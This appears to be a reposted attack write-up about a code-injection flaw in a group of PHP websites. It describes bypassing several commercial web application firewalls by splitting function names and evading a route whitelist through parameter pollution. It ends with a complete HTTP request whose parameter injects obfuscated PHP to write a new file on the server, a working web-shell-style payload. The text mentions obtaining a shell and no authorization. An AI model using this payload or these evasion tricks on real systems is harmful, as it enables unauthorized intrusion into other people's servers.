Authorized for reprint, feel free to follow the public account if interested
A vulnerability left by a certain centralized station group last year was found to be intercepted this year when used. Just complaining, is this completely crazy? What’s up with Baidu Cloud WAF, Huawei Cloud WAF, and Security Dog all together...
waf bypass
It's relatively simple, just filter out the eval encoding.
Router whitelist restriction bypass
Casually requesting access revealed a routing restriction, only allowing access to specified paths.
However, it’s impossible to hardcode all paths. For example, the search function needs to receive user input. Packet capture confirmed that the search interface can be used normally and will not trigger the router whitelist restriction.
Therefore, it is speculated that parameter pollution can be used to bypass the restriction, for example:
Insert same name parameter#
/index.php?name=bob&name=rose
The backend may actually receive#
name=rose
After getting a shell, check the code and confirm that this interface matches any content.
Final payload
POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'